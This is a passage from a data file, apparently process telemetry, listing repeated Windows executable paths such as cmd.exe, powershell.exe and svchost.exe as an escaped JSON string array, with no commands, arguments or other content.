\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\